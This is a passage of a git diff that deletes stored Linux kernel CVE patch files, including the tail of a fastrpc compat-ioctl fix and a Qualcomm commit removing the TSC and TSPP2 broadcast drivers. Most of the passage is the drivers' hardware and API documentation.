--		pra[j].buf.pv = 0;
--		err |= put_user(p, (compat_uptr_t *)&pra[j].buf.pv);
-+		err |= put_user(p, (uintptr_t *)&pra[j].buf.pv);
- 		err |= get_user(s, &pra32[j].buf.len);
- 		err |= put_user(s, &pra[j].buf.len);
- 	}
-@@ -121,7 +121,7 @@ static int compat_get_fastrpc_ioctl_invoke(
- 		err |= put_user(u, &pra[num + j].h);
- 	}
- 
--	inv->fds = NULL;
-+	err |= put_user(NULL, &inv->fds);
- 	if (cmd == COMPAT_FASTRPC_IOCTL_INVOKE_FD) {
- 		err |= get_user(p, &inv32->fds);
- 		err |= put_user(p, (compat_uptr_t *)&inv->fds);
-@@ -173,8 +173,7 @@ static int compat_get_fastrpc_ioctl_mmap(
- 	err |= get_user(u, &map32->flags);
- 	err |= put_user(u, &map->flags);
- 	err |= get_user(p, &map32->vaddrin);
--	map->vaddrin = NULL;
--	err |= put_user(p, (compat_uptr_t *)&map->vaddrin);
-+	err |= put_user(p, (uintptr_t *)&map->vaddrin);
- 	err |= get_user(s, &map32->size);
- 	err |= put_user(s, &map->size);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0573/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-0573/ANY/0001.patch
deleted file mode 100644
index 3af61d83..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0573/ANY/0001.patch
+++ /dev/null
@@ -1,12987 +0,0 @@
-From e20f20aaed6b6d2fd1667bad9be9ef35103a51df Mon Sep 17 00:00:00 2001
-From: Liron Kuch <lkuch@codeaurora.org>
-Date: Sun, 6 Sep 2015 11:19:39 +0300
-Subject: msm: broadcast: Remove unused TSC and TSPP2 drivers
-
-TSC and TSPP2 were HW blocks in MPQ8092 target which is
-no longer supported. Remove TSC and TSPP2 drivers to
-eliminate unused code.
-
-Change-Id: Ibb55ae0d15b33ba5855bde69e78925d23def3c6b
-Signed-off-by: Liron Kuch <lkuch@codeaurora.org>
----
- Documentation/arm/msm/tsc.txt                 |  398 --
- Documentation/arm/msm/tspp2.txt               |  497 --
- drivers/media/platform/msm/broadcast/Makefile |    2 -
- drivers/media/platform/msm/broadcast/tsc.c    | 3450 ----------
- drivers/media/platform/msm/broadcast/tspp2.c  | 8578 -------------------------
- 5 files changed, 12925 deletions(-)
- delete mode 100644 Documentation/arm/msm/tsc.txt
- delete mode 100644 Documentation/arm/msm/tspp2.txt
- delete mode 100644 drivers/media/platform/msm/broadcast/tsc.c
- delete mode 100644 drivers/media/platform/msm/broadcast/tspp2.c
-
-diff --git a/Documentation/arm/msm/tsc.txt b/Documentation/arm/msm/tsc.txt
-deleted file mode 100644
-index 11e74a2..0000000
---- a/Documentation/arm/msm/tsc.txt
-+++ /dev/null
-@@ -1,398 +0,0 @@
--Introduction
--============
--
--TSC Driver
--
--The TSC (Transport Stream Controller) is a hardware block used in products such
--as smart TVs, Set-top boxes and digital media adapters, and is responsible for
--two main functionalities:
--
--1. Mux function: enabling the routing of MPEG-2 transport streams (TS) received
--from terrestrial/cable/satelite in order to support the different topologies of
--the end product, as it may be deployed in many different topologies.
--In addition, the active topology may change according to various factors such as
--broadcast technology and/or conditional access system.
--
--2. CI function: acting as a common interface, complying with both PC Card and
--CI/+ specifications.
--
--The TSC driver has two different interfaces, one for each function.
--
--Hardware description
--====================
--The TSC HW contains the TSC core, and uses the VBIF unit (IOMMU) which is part
--of the broadcast subsystem HW.
--
--Mux function:
---------------
--The TSC can receive transport streams from:
--a. Two Transport Stream Interfaces (TSIFs) 0 or 1, connected to two external
--demods or to external bridge.
--b. One TSIF from an integrated demod.
--
--The TSC can route TS from any of the above TSIFs to an external CICAM, using a
--software configurable mux.
--The TSC can route TS from any of the above TSIFs, and TS received from the CI
--Conditional Access Mudule (CICAM) to two TSIF outputs (0 or 1), using two
--software configurable muexes.
--The CICAM input and outputs are also managed via two additional TSIFs: TSIF-out
--to the CAM, and TSIF-in from the CAM.
--
--CI function:
--------------
--The common interface is composed of:
--1. Card detection logic: the TSC notifies the SW of any change in the card
--detection status (via HW interrupt).
--
--2. Control interface used to send/receive the CI messages (APDUs), supporting
--data transmission in two formats:
--a. Single byte transactions: to/from the attribute memory space of the CAM and
--   the command area of the CAM.
--b. Buffer transactions: to/from the command area of the CAM, using a
--   configurable buffer size of 1k bytes-64k bytes. This enables transferring
--   large chunks of data between the CAM and applications.
--   The data buffer resides in the external memory and the interface to the
--   memory is done through BCSS VBIF.
--The TSC uses PCMCIA interface to interact with the CAM.
--
--The following diagram provides an overview of the TSC HW:
--+-------------------------------------------------------------------------+
--|                                                                         |
--|                +------------------------------+                         |
--| +-----------+  |          TSC Core     --.    |                         |
--| |Ext. TSIF 0+------------+------------>|  \   |  +-----------+          |
--| +-----------+  |   +-----|------------>|Mux)----->TSPP TSIF 0|          |
--| +-----------+  |   |  +--|------------>|  /   |  +-----------+          |
--| |Ext. TSIF 1+------|  |  |          +->--'    |                         |
--| +-----------+  |   |  |  |          |  --.    |                         |
--|                |   |  |  +----------|->|  \   |  +-----------+          |
--| +-----------+  |   +--|--|-+--------|->|Mux)----->TSPP TSIF 1|          |
--| |Int. TSIF  +---------+--|-|-+------|->|  /   |  +-----------+          |
--| +-----------+  |         | | |      +->--'    |                         |
--|                |         | | |      |         |                         |
--|                |         | | |      |         |                         |
--|                |+------+(v-v-v--)   |  +-----+|                         |
--|                ||Card  | \ Mux /    |  |CI/+ +---Data-Interface--+      |
--|                ||detect|  `---'     |  +----++|                  |      |
--|                |+-^-^--+    |       |       | |                  |      |
--|                +--|-|-------|-------|-------|-+           +------+----+ |
--|                   | |       |       |       |             |   VBIF    | |
--|                   | | +-----v--+ +--+----+  |             |           | |
--|                   | | |TSIF-Out| |TSIF-In|  |             +-----------+ |
--|                   | | +-----+--+ +--^----+  |                           |
--|                   | |       |       |       |                           |
--|                  ++-+-------v-------+-------++                          |
--|                  |         CICAM             |                          |
--|                  |                           |                          |
--|                  +---------------------------+                          |
--+-------------------------------------------------------------------------+
--
--Software description
--====================
--The TSC Linux kernel driver manages the TSC core. It is a standard Linux
--platform device driver. It can be configured as a loadable or built-in kernel
--module. The driver is supported only in platforms that contain the TSC HW.
--
--The TSC driver uses ION driver to control the IOMMU and map user-allocated
--buffers to the TSC IOMMU domain.
--
--The driver provides an abstraction of the TSC HW functionality for user-space
--clients via two separate interfaces: tsc_mux and tsc_ci. These interfaces may
--be used by upper layers to utilize the TSC HW for routing the TS and supporting
--the Common Interface specification.
--
--Driver initialization
-----------------------
--The driver's probe function is invoked if there is a matching device tree node.
--The probe function gets the required memory resources (i.e., register address
--spaces) and maps them to kernel space for the driver's use.
--The probe function also requests the required IRQs, GPIOs and clocks, and gets
--the TSC IOMMU domain. The probe function also disables the TSIFs input.
--Finally, the function creates two character device drivers: "tsc_mux","tsc_ci".
--
--See API description in interface section.
--
--Data paths
-------------
--The TSC does not process the TS data received from the TSIFs. It just manages
--the routing of that data.
--
--Control paths - Mux function
------------------------------
--Example for routing the TS from external demod TSIF 0 to the CAM, and from the
--CAM to TSIF 1 of the TSPP:
--
--struct tsc_route tsif_cam = {TSC_SOURCE_EXTERNAL0, TSC_DEST_CICAM};
--struct tsc_route cam_tspp = {TSC_SOURCE_CICAM, TSC_DEST_TSPP1};
--int mux_fd, ret;
--enum tsc_source tsif0 = TSC_SOURCE_EXTERNAL0;
--enum tsc_source cam = TSC_SOURCE_CICAM;
--
--/* opening Mux char device */
--mux_fd = open("/dev/tsc_mux0");
--
--/* Configure the CAM mux to route TS from external demod TSIF 0: */
--ret = ioctl(mux_fd, TSC_CONFIG_ROUTE, &tsif_cam);
--
--/* Configure the TSPP TSIF 1 mux to route TS from CAM: */
--ret = ioctl(mux_fd, TSC_CONFIG_ROUTE, &cam_tspp);
--
--/* Enabling the external demod TSIF 0, and the CAM TSIF-in and TSIF-out */
--ret = ioctl(mux_fd, TSC_ENABLE_INPUT, &tsif0);
--ret = ioctl(mux_fd, TSC_ENABLE_INPUT, &cam);
--
--close(mux_fd);
--
--Control paths - CI function
-----------------------------
--Example for writing a buffer to the CAM command area:
--
--Assumptions:
--1. The user allocated a buffer using ION driver and wrote to that buffer.
--Also, retrieved the ion fd of that buffer and saved it to:
--int buffer_fd;
--2. The user already performed buffer size negotiation with the CAM according to
--CI/+ specification, and had set the CAM size register with the buffer size. This
--size is saved to: int size;
--3. The user decided about the time the user wants to wait for the data
--transmission.
--struct tsc_buffer_mode buff_params = {buffer_fd, size, timeout};
--int ret;
--
--/* Perform a blocking write buffer transaction for at most timeout */
--ret = ioctl(fd, TSC_WRITE_CAM_BUFFER, &buff_params);
--/* ret indicate whether the transaction succeeded */
--
--Example for SW reset to the CAM (according to CI/+ specification):
--struct single_byte_mode cmd_params = {1, RS bit set, timeout};
--struct single_byte_mode stat_params = {1, not initialize, timeout};
--int ci_fd, ret;
--u8 data;
--
--/* opening CI char device */
--ci_fd = open("/dev/tsc_ci0");
--
--/* Setting the RS bit of the CAM command register */
--ret = ioctl(ci_fd, TSC_WRITE_CAM_IO, &cmd_params);
--
--/* Polling the FR bit of the CAM status register */
--ret = ioctl(ci_fd, TSC_READ_CAM_IO, &stat_params);
--data = stat_params.data;
--while (data & FR_BIT_MASK) {
--	ret = ioctl(ci_fd, TSC_READ_CAM_IO, &stat_params);
--	data = stat_params.data;
--}
--
--close(ci_fd);
--
--Design
--======
--The TSC driver is a regular Linux platform driver designed to support the
--TSC HW available on specific SoCs.
--
--The driver provides two user-space APIs: tsc_mux that allows the client full
--control over the configuration of the TS routing, and tsc_ci that enables the
--client to implement the Common Interface in front of the CAM. It does so while
--encapsulating HW implementation details that are not relevant to the clients.
--
--The driver enforces HW restrictions and checks for input parameters
--validity, providing a success or failure return value for each API function:
--0 upon success or negative value on failure. Errno parameter is set to indicate
--the failure reason.
--However, the driver does not enforce any high-level policy with regard to the
--correct use of the TSC HW for various use-cases.
--
--Power Management
--================
--The TSC driver prevents the CPU from sleeping while the HW is active by using
--wakeup_source API. When there are no open devices the driver releases the wakeup
--source. In a similar manner, the driver enables the HW clocks only when needed.
--
--SMP/multi-core
--==============
--The driver uses a spinlock to protect accesses to its internal databases,
--for synchronization between user control API and kernel interrupt handlers.
--
--The driver uses a mutex for all the Mux operations to synchronize access to the
--routing internal databases. The driver uses another mutex for all the CI
--operations to synchronize data sent and received to and from the CAM.
--
--Security
--========
--Although the TSC is the bridge the external conditional access module, it has no
--security aspects. Any protection which is needed is performed by the upper
--layers. For example, the messages which are written to the CAM are encrypted.
--Thus the TSC accesses only non-protected, HLOS accessible memory regions.
--
--Performance
--===========
--Control operations are not considered as performance critical.
--Most of the control operations are assumed to be fairly uncommon.
--
--Interface
--=========
--Kernel-space API
------------------
--The TSC driver does not provide any kernel-space API, only a user-space API.
--
--User-space API
------------------
--Open: upper layer can open tsc_mux device and/or tsc_ci device.
--Release: close the device and release all the allocated resources.
--Poll: two different functions- one for Mux, one for CI. The Mux poll wait for
--rate mismatch interrupt. The CI poll waits for card detection HW interrupt.
--The rate mismatch interrupt is not cleared in the interrupt handler because it
--will signal again all the time. Therefore it is cleared via a specific ioctl
--that upper layer can use after the problem is solved. Additionally, the
--interrupt is cleared when the card is removed.
--ioctl: two functions, one for mux and one for ci. The ioctl are specified below.
--
--TSC Mux - routing the TS:
---------------------------
--enum tsc_source {
--	TSC_SOURCE_EXTERNAL0,
--	TSC_SOURCE_EXTERNAL1,
--	TSC_SOURCE_INTERNAL,
--	TSC_SOURCE_CICAM
--};
--enum tsc_dest {
--	TSC_DEST_TSPP0,
--	TSC_DEST_TSPP1,
--	TSC_DSET_CICAM
--};
--
--struct tsc_route {
--	enum tsc_source source;
--	enum tsc_dest dest;
--};
--
--#define TSC_CONFIG_ROUTE _IOW(TSC_IOCTL_BASE, 0, struct tsc_tspp_route)
--#define TSC_ENABLE_INPUT _IOW(TSC_IOCTL_BASE, 1, enum tsc_source)
--#define TSC_DISABLE_INPUT _IOW(TSC_IOCTL_BASE, 2, enum tsc_source)
--
--These 3 IOCTLs control the 3 muxes that route the TS, and enable/disable the
--TSIFs input.
--
--TSC Mux - configuring the TSIFs:
----------------------------------
--enum tsc_data_type {
--	TSC_DATA_TYPE_SERIAL,
--	TSC_DATA_TYPE_PARALLEL
--};
--enum tsc_receive_mode {
--	TSC_RECEIVE_MODE_START_VALID,
--	TSC_RECEIVE_MODE_START_ONLY,
--	TSC_RECEIVE_MODE_VALID_ONLY
--};
--
--struct tsc_tsif_params {
--	enum tsc_source source;
--	enum tsc_receive_mode receive_mode;
--	enum tsc_data_type data_type;
--	int clock_polarity;
--	int data_polarity;
--	int start_polarity;
--	int valid_polarity;
--	int error_polarity;
--	int data_swap;
--	int set_error;
--};
--
--#define TSC_SET_TSIF_CONFIG _IOW(TSC_IOCTL_BASE, 3, struct tsc_tsif_params)
--
--This IOCTL enables configuring a specific TSIF with all possible configurations.
--
--TSC Mux - clearing rate mismatch interrupt
--------------------------------------------
--
--#define TSC_CLEAR_RATE_MISMATCH_IRQ _IO(TSC_IOCTL_BASE, 4)
--
--This IOCTL is used for clearing the interrupt, which is not done automatically
--by the driver.
--
--TSC CI - CAM configuration:
-----------------------------
--enum tsc_cam_personality {
--	TSC_CICAM_PERSONALITY_CI,
--	TSC_CICAM_PERSONALITY_CIPLUS,
--	TSC_CICAM_PERSONALITY_PCCARD,
--	TSC_CICAM_PERSONALITY_DISABLE
--};
--enum tsc_card_status {
--	TSC_CARD_STATUS_NOT_DETECTED,
--	TSC_CARD_STATUS_DETECTED,
--	TSC_CARD_STATUS_FAILURE
--};
--
--#define TSC_CICAM_SET_CLOCK _IOW(TSC_IOCTL_BASE, 5, int)
--This IOCTL sets the clock rate of the TS from the TSC to the CAM
--
--#define TSC_CAM_RESET _IO(TSC_IOCTL_BASE, 6)
--This IOCTL performs HW reset to the CAM
--
--#define TSC_CICAM_PERSONALITY_CHANGE 		\
--	_IOW(TSC_IOCTL_BASE, 7, enum tsc_cam_personality)
--This IOCTL configures the PCMCIA pins according to the specified card type.
--
--#define TSC_GET_CARD_STATUS _IOR(TSC_IOCTL_BASE, 8, enum tsc_card_status)
--This IOCTL queries the card detection pins and returns their status.
--
--TSC CI - Data transactions:
-----------------------------
--struct tsc_single_byte_mode {
--	u16 address;
--	u8 data;
--	int timeout; /* in msec */
--};
--struct tsc_buffer_mode {
--	int buffer_fd;
--	u16 buffer_size;
--	int timeout; /* in msec */
--};
--
--#define TSC_READ_CAM_MEMORY			\
--	_IOWR(TSC_IOCTL_BASE, 9, struct tsc_single_byte_mode)
--#define TSC_WRITE_CAM_MEMORY		\
--	_IOW(TSC_IOCTL_BASE, 10, struct tsc_single_byte_mode)
--#define TSC_READ_CAM_IO				\
--	_IOWR(TSC_IOCTL_BASE, 11, struct tsc_single_byte_mode)
--#define TSC_WRITE_CAM_IO			\
--	_IOW(TSC_IOCTL_BASE, 12, struct tsc_single_byte_mode)
--#define TSC_READ_CAM_BUFFER			\
--	_IOWR(TSC_IOCTL_BASE, 13, struct tsc_buffer_mode)
--#define TSC_WRITE_CAM_BUFFER		\
--	_IOW(TSC_IOCTL_BASE, 14, struct tsc_buffer_mode)
--
--These IOCTLs performs a read/write data transaction of the requested type.
--
--Driver parameters
--=================
--The TSC module receives one parameter:
--tsc_iommu_bypass -  0 for using the VBIF, 1 for not using it. Not using the VBIF
--is a debug configuration.
--
--Config options
--==============
--To enable the driver, set CONFIG_TSC to y (built-in) or m (kernel module)
--in the kernel configuration menu.
--
--Dependencies
--============
--The TSC driver uses the ION driver for IOMMU registration and buffer
--mapping to BCSS VBIF.
--
--User space utilities
--====================
--None.
--
--Other
--=====
--None.
--
--Known issues
--============
--None.
--
--To do
--=====
--None.
-diff --git a/Documentation/arm/msm/tspp2.txt b/Documentation/arm/msm/tspp2.txt
-deleted file mode 100644
-index 006c688..0000000
---- a/Documentation/arm/msm/tspp2.txt
-+++ /dev/null
-@@ -1,497 +0,0 @@
--Introduction
--============
--
--TSPP2 Driver
--
--The TSPP2 (Transport Stream Packet Processor v2) is a hardware accelerator
--designed to process MPEG-2 Transport Stream (TS) data. It can be used to
--process broadcast TV services. The TSPP2 HW processes the TS packets, offloads
--the host CPU and supports the real-time processing requirements of such
--services.
--
--TS data can be received either from TSIF (Transport Stream Interface) input
--or from memory input, to support playing live broadcasts as well as
--playback from memory. Recording is also supported.
--
--TSPP2 is a significantly different HW unit than the TSPP unit described in
--Documentation/arm/msm/tspp.txt. The functionality is enhanced and the HW
--design is different.
--
--Hardware description
--====================
--The TSPP2 HW contains the TSPP2 core, a BAM (Bus Access Manager, used for DMA
--operations) unit, and a VBIF unit (IOMMU).
--
--The TSPP2 HW supports:
--a. Up to two TSIF inputs and up to eight memory inputs.
--b. Various TS packet sizes (188/192 bytes) and formats (timestamp location).
--c. PID filtering.
--d. Raw transmit operation for section filtering or recording.
--e. Full PES and separated PES transmit operation for audio and video playback.
--f. Decryption and re-encryption operations for secure transport streams.
--g. PCR extraction.
--h. Indexing - identifying patterns in video streams.
--
--The following diagram provides an overview of the TSPP2 HW:
--+------------------------------------------------------------------+
--|                                                                  |
--| +-------------+   +--------------------+                         |
--| |  TSIF 0     +--->      TSPP2 Core    |                         |
--| +-------------+   |                    |                         |
--|                   |  +---------------+ |                         |
--| +-------------+   |  |               | |                         |
--| |  TSIF 1     +--->  |   Source 0    | |                         |
--| +-------------+   |  |               | |                         |
--|                   |  |               | |                         |
--|                   |  |               | |                         |
--|                   |  | +------------+| |       +--------------+  |
--|                   |  | | Filter 0   +|--------->  BAM pipe 3  |  |
--|                   |  | +------------+| |       +--------------+  |
--|                   |  | +------------+| |       +--------------+  |
--| +-------------+   |  | | Filter 1   +|--------->  BAM pipe 4  |  |
--| |  BAM pipe 0 +--->  | +------------+| |       +--------------+  |
--| +-------------+   |  |               | |              |          |
--| +-------------+   |  +---------------+ |    +--------------+     |
--| |  BAM pipe 1 +--->--------------------|----|              |     |
--| +-------------+   |                    |    |   VBIF       |     |
--| +-------------+   |                    |    |   IOMMU      |     |
--| |  BAM pipe 2 +--->--------------------|----|              |     |
--| +-------------+   +--------------------+    +--------------+     |
--+------------------------------------------------------------------+
--
--A source is configured to have either a TSIF input (TSIF 0 or 1) or a
--memory input (a BAM pipe). One or more filters are attached to the source.
--Each filter has a 13-bit PID and mask values to perform the PID filtering.
--Additionally, one or more operations are added to each filter to achieve the
--required functionality. Each operation has specific parameters. The operation's
--output is usually placed in an output pipe.
--
--The TSPP HW uses its own virtual address space, mapping memory buffer addresses
--using the VBIF IOMMU.
--
--Software description
--====================
--The TSPP2 Linux kernel driver manages the TSPP2 core. The TSPP2 driver utilizes
--the SPS driver to configure and manage the BAM unit, which is used to perform
--DMA operations and move TS data to/from system memory.
--
--The TSPP2 driver uses the ION driver to control the IOMMU and map user-allocated
--buffers to the TSPP2 IOMMU domain.
--
--The TSPP2 is a standard Linux platform device driver. It can be configured as a
--loadable or built-in kernel module. The driver is supported only in platforms
--that contain the TSPP2 HW.
--
--The driver provides an abstraction of the TSPP2 HW functionality for
--kernel-space clients. For example, the dvb/demux kernel driver, which provides
--an API for upper layers to perform TS de-multiplexing (including PID filtering,
--recording, indexing etc.), uses the TSPP2 driver to utilize the TSPP2 HW and
--offload the CPU, instead of doing all the required processing in SW.
--
--For further information please refer to Documentation/dvb/qcom-mpq.txt.
--
--Terminology
-------------
--This section describes some of the software "objects" implemented by the driver.
--
--a. TSPP2 device: an instance of the TSPP2 device representing the TSPP2 HW and
--its capabilities. The client identifies a device instance according to a
--device ID.
--
--b. Indexing table: A TSPP2 device contains 4 indexing tables. These tables are
--used to identify patterns in the video stream and report on them.
--The client identifies an indexing table according to a table ID.
--
--c. Pipe: a BAM pipe used for DMA operations. The TSPP2 HW has a BAM unit with
--31 pipes. A pipe contains a memory buffer and a corresponding descriptor ring,
--and is used as the output for TSPP2 data (e.g. PES payload, PES headers,
--indexing information etc.). For memory inputs, a pipe is used as the input
--buffer where data can be written to for TSPP2 processing. BAM Pipes are
--managed by the TSPP2 driver using the SPS driver which controls BAM HW. The
--client is responsible for buffer memory allocation, and can control many
--BAM-related pipe parameters.
--
--d. Source: a source object represents data "stream" from the TS input,
--through the filters and operations that perform the processing on the TS data,
--until the output. A source has the following properties:
--	- Either a TSIF or a memory input.
--	- For memory input: an input pipe.
--	- Source-related configuration (e.g., packet size and format).
--	- One or more PID filters. Each filter contains operations.
--	- One or more output pipes.
--The client is responsible to configure the source object as needed using the
--appropriate API. The client identifies a source using a source handle, which
--the driver provides when opening a source for use.
--
--e. Filter: a filter object represents a PID filter which is used to get only the
--TS packets with specific PIDs and filter out all other TS packets in the stream.
--The client adds filters to the source object to define the processing of data.
--Each filter has a 13-bit PID value and bit-mask, so a filter can be used to
--get TS packets with various PID values. Note, however, that it is highly
--recommended to use each filter with a unique PID (i.e., 0x1FFF mask), and it is
--mandatory that the PIDs handled by each source's filters are mutually exclusive
--(i.e., the client must not configure two filters in the same source that handle
--the same PID values). A filter has up to 16 operations that instruct the TSPP2
--HW how to process the data. The client identifies a filter using a filter
--handle, which the driver provides when opening a filter for use.
--
--f. Operation: an operation object represents a basic building block describing
--how data is processed. Operations are added to a filter and are performed on
--the data received by this filter, in the order they were added. One or more
--operations may be required to achieve the desired functionality. For example,
--a "section filtering" functionality requires a raw transmit operation, while a
--"recording" functionality requires a raw transmit operations as well as an
--indexing operation (to support trick modes).
--
--Driver initialization
-----------------------
--The driver's probe function is invoked if there is a matching device tree node
--(or platform device). The probe function gets the required memory resources
--(i.e., register address spaces) and maps them to kernel space for the
--driver's use. The probe function also request the required IRQs and gets the
--TSPP2 IOMMU domain. Finally, the probe function resets all HW registers to
--appropriate default values, and resets all the required software structures.
--
--See API description in Interface section.
--
--Usage examples
----------------
--
--Section filtering example - opening a Raw filter with data from TSIF0:
------------------------------------------------------------------------
--u32 dev_id = 0;
--u32 src_handle;
--u32 pipe_handle;
--u32 filter_handle;
--u32 iova;
--u32 vaddress;
--struct tspp2_config cfg = {...};
--struct tspp2_pipe_config_params pipe_config;
--struct tspp2_pipe_pull_mode_params pull_params = {0, 0};
--struct tspp2_operation raw_op;
--struct sps_event_notify event;
--struct sps_iovec desc;
--
--/* Open TSPP2 device for use */
--tspp2_device_open(dev_id);
--
--/* Set global configuration */
--tspp2_config_set(dev_id, &cfg);
--
--/* Open source with TSIF0 input */
--tspp2_src_open(dev_id, TSPP2_INPUT_TSIF0, &src_handle);
--
--/* Set parsing options if needed, for example: */
--tspp2_src_parsing_option_set(src_handle,
--				TSPP2_SRC_PARSING_OPT_CHECK_CONTINUITY, 1);
--
--/* Assume normal sync byte, assume no need for scrambling configuration */
--
--/* Set packet size and format: */
--tspp2_src_packet_format_set(src_handle, TSPP2_PACKET_FORMAT_188_RAW);
--
--/* Since this is TSIF input, flow control is in push mode */
--
--/* Allocate memory for output pipe via ION – not shown here */
--
--/* Open an output pipe for use */
--pipe_config.ion_client = ...
--pipe_config.buffer_handle = ...
--pipe_config.buffer_size = ...
--pipe_config.pipe_mode = TSPP2_SRC_PIPE_OUTPUT;
--pipe_config.sps_cfg.descriptor_size = 188;
--pipe_config.sps_cfg.setting = (SPS_O_AUTO_ENABLE | SPS_O_HYBRID |
--				SPS_O_OUT_OF_DESC | SPS_O_ACK_TRANSFERS);
--pipe_config.sps_cfg.wakeup_events = SPS_O_OUT_OF_DESC;
--pipe_config.sps_cfg.callback = ...
--pipe_config.sps_cfg.user_info = ...
--tspp2_pipe_open(dev_id, &pipe_config, &iova, &pipe_handle);
--
--/* Attache the pipe to the source */
--tspp2_src_pipe_attach(src_handle, pipe_handle, &pull_params);
--/* Open a filter for PID 13 */
--tspp2_filter_open(src_handle, 13, 0x1FFF, &filter_handle);
--
--/* Add a raw transmit operation */
--raw_op.type = TSPP2_OP_RAW_TRANSMIT;
--raw_op.params.raw_transmit.input = TSPP2_OP_BUFFER_A;
--raw_op.params.raw_transmit.timestamp_mode = TSPP2_OP_TIMESTAMP_NONE;
--raw_op.params.raw_transmit.skip_ts_packets_with_errors = 0;
--raw_op.params.raw_transmit.output_pipe_handle = pipe_handle;
--tspp2_filter_operations_add(filter_handle, &raw_op, 1);
--
--/* Enable filter and source to start getting data */
--tspp2_filter_enable(filter_handle);
--tspp2_source_enable(src_handle);
--
--/*
-- * Data path: poll pipe (or get notifications from pipe via
-- * registered callback).
-- */
--tspp2_pipe_last_address_used_get(pipe_handle, &vaddress);
--
--/* Process data... */
--
--/* Get and release descriptors: */
--tspp2_pipe_descriptor_get(pipe_handle, &desc);
--tspp2_pipe_descriptor_put(pipe_handle, desc.addr, desc.size, ...);
--
--/* Teardown: */
--tspp2_src_disable(src_handle);
--tspp2_filter_disable(filter_handle);
--tspp2_filter_close(filter_handle);
--tspp2_src_pipe_detach(src_handle, pipe_handle);
--tspp2_pipe_close(pipe_handle);
--tspp2_src_close(src_handle);
--tspp2_device_close(dev_id);
--
--Debug facilities
------------------
--The TSPP2 driver supports several debug facilities via debugfs:
--a. Ability to read the status of TSIF and TSPP2 HW registers via debugfs.
--b. Ability to print HW statistics, error and performance counters via debugfs.
--c. Ability to print SW status via debugfs.
--
--Design
--======
--The TSPP2 driver is a regular Linux platform driver designed to support the
--TSPP2 HW available on specific Qualcomm SoCs.
--
--The driver provides an extensive kernel-space API to allow the client full
--control over the configuration of the TSPP2 HW, while encapsulating HW
--implementation details that are not relevant to the client.
--
--The driver enforces HW restrictions and checks for input parameters
--validity, providing a success or failure return value for each API function.
--However, the driver does not enforce any high-level policy with regard to the
--correct use of the TSPP2 HW for various use-cases.
--
--Power Management
--================
--The TSPP2 driver prevents the CPU from sleeping while the HW is active by
--using the wakeup_source API. When the HW is not active (i.e., no sources
--configured), the driver indicates it is ready for system suspend by invoking
--__pm_relax(). When the HW needs to be active (i.e., a source has been opened and
--enabled), the driver invokes __pm_stay_awake().
--
--In a similar manner, the driver enables the HW clocks only when needed.
--The TSPP2 HW manages power saving automatically when the HW is not used.
--No SW involvement is required.
--
--SMP/multi-core
--==============
--The driver uses a mutex for mutual exclusion between kernel API calls.
--A spinlock is used to protect accesses to its internal databases which can be
--performed both from interrupt handler context and from API context.
--
--Security
--========
--None.
--
--Performance
--===========
--Control operations are not considered as performance critical.
--Most of the control operations are assumed to be fairly uncommon.
--Data-path operations involve only getting descriptors from the pipe and
--releasing them back to the pipe for reuse.
--
--Interface
--=========
--Kernel-space API
------------------
--
--Control path API
---------------------
--
--TSPP2 device open / close API:
--------------------------------
--int tspp2_device_open(u32 dev_id);
--
--int tspp2_device_close(u32 dev_id);
--
--Global configuration for the TSPP2 device:
--------------------------------------------
--int tspp2_config_set(u32 dev_id, const struct tspp2_config *cfg);
--	Set device global configuration.
--
--int tspp2_config_get(u32 dev_id, struct tspp2_config *cfg);
--	Get current device global configuration.
--
--Configure Indexing Tables:
----------------------------
--int tspp2_indexing_prefix_set(u32 dev_id, u8 table_id, u32 value, u32 mask);
--	Set prefix value and mask of an indexing table.
--
--int tspp2_indexing_patterns_add(u32 dev_id, u8 table_id, const u32 *values,
--				const u32 *masks, u8 patterns_num);
--	Add patterns to an indexing table.
--
--int tspp2_indexing_patterns_clear(u32 dev_id, u8 table_id);
--	Clear all patterns of an indexing table
--
--Opening and closing Pipes:
----------------------------
--int tspp2_pipe_open(u32 dev_id, const struct tspp2_pipe_config_params *cfg,
--			u32 *iova, u32 *pipe_handle);
--	Open a pipe for use.
--
--int tspp2_pipe_close(u32 pipe_handle);
--	Close an opened pipe.
--
--Source configuration:
-----------------------
--int tspp2_src_open(u32 dev_id, enum tspp2_src_input input, u32 *src_handle);
--	Open a new source for use.
--
--int tspp2_src_close(u32 src_handle);
--	Close an opened source.
--
--int tspp2_src_parsing_option_set(u32 src_handle,
--			enum tspp2_src_parsing_option option, int value);
--	Set source parsing configuration option.
--
--int tspp2_src_parsing_option_get(u32 src_handle,
--			enum tspp2_src_parsing_option option, int *value);
--	Get source parsing configuration option.
--
--int tspp2_src_sync_byte_config_set(u32 src_handle, int check_sync_byte,
--			u8 sync_byte_value);
--	Set source sync byte configuration.
--
--int tspp2_src_sync_byte_config_get(u32 src_handle, int *check_sync_byte,
--			u8 *sync_byte_value);
--	Get source sync byte configuration.
--
--int tspp2_src_scrambling_config_set(u32 src_handle,
--			const struct tspp2_src_scrambling_config *cfg);
--	Set source scrambling configuration.
--
--int tspp2_src_scrambling_config_get(u32 src_handle,
--			struct tspp2_src_scrambling_config *cfg);
--	Get source scrambling configuration.
--
--int tspp2_src_packet_format_set(u32 src_handle,
--			enum tspp2_packet_format format);
--	Set source packet size and format.
--
--int tspp2_src_pipe_attach(u32 src_handle, u32 pipe_handle,
--			const struct tspp2_pipe_pull_mode_params *cfg);
--	Attach a pipe to a source.
--
--int tspp2_src_pipe_detach(u32 src_handle, u32 pipe_handle);
--	Detach a pipe from a source.
--
--int tspp2_src_enable(u32 src_handle);
--	Enable source (start using it).
--
--int tspp2_src_disable(u32 src_handle);
--	Disable source (stop using it).
--
--int tspp2_src_filters_clear(u32 src_handle);
--	Clear all filters from a source.
--
--Filter and Operation configuration:
-------------------------------------
--int tspp2_filter_open(u32 src_handle, u16 pid, u16 mask, u32 *filter_handle);
--	Open a new filter and add it to a source.
--
--int tspp2_filter_close(u32 filter_handle);
--	Close a filter.
--
--int tspp2_filter_enable(u32 filter_handle);
--	Enable a filter.
--
--int tspp2_filter_disable(u32 filter_handle);
--	Disable a filter.
--
--int tspp2_filter_operations_set(u32 filter_handle,
--			const struct tspp2_operation *ops, u8 operations_num);
--	Set (add or update) operations to a filter.
--
--int tspp2_filter_operations_clear(u32 filter_handle);
--	Clear all operations from a filter.
--
--int tspp2_filter_current_scrambling_bits_get(u32 filter_handle,
